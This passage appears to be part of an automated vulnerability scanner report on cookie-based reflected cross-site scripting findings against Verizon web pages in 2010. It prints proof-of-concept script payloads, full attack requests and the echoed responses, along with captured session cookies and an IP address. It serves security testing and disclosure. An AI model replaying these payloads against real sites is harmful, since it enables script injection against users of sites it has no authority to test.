Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX5e917'><script>alert(1)</script>680f4f478a3; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 02:53:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=TX5e917'><script>alert(1)</script>680f4f478a3; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5E917'><SCRIPT>ALERT(1)</SCRIPT>680F4F478A3 ' />
...[SNIP]...

1.198. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9c96"-alert(1)-"386419827f6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=d9c96"-alert(1)-"386419827f6; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77874
Expires: Sat, 20 Nov 2010 02:53:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:45 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "d9c96"-alert(1)-"386419827f6"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.199. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/content/verizonglobalhome/gpromo.aspx

Issue detail

The value of the vzapps cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ae0f'-alert(1)-'8c7ffab235 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/verizonglobalhome/gpromo.aspx?a=1290217502286&state=TX HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; CP=null*; canigetfios=Y; showpromo=Y; BusinessUnit=residential; refURL=https://www22.verizon.com/; vzapps=STATE=TX8ae0f'-alert(1)-'8c7ffab235

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 13077
Expires: Sat, 20 Nov 2010 01:55:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:55:03 GMT
Connection: keep-alive


<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>

                        <UL><LI><A class="marquee_selector
...[SNIP]...
<script>if(document.getElementById('yourlocation')) document.getElementById('yourlocation').innerHTML = 'TX8ae0f'-alert(1)-'8c7ffab235 ';</script>
...[SNIP]...

1.200. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4d80b<script>alert(1)</script>dfd32d9c68b was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4d80b<script>alert(1)</script>dfd32d9c68b; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:42:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:42:02 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4d80b<script>alert(1)</script>dfd32d9c68b</span>
...[SNIP]...

1.201. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/foryourhome/fttprepair/nr/common/MainMenu.aspx

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload f407d<script>alert(1)</script>0ced4116a66 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /foryourhome/fttprepair/nr/common/MainMenu.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf407d<script>alert(1)</script>0ced4116a66; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:41:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:41:57 GMT
Connection: close

<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong>, TXf407d<script>alert(1)</script>0ced4116a66 </span>
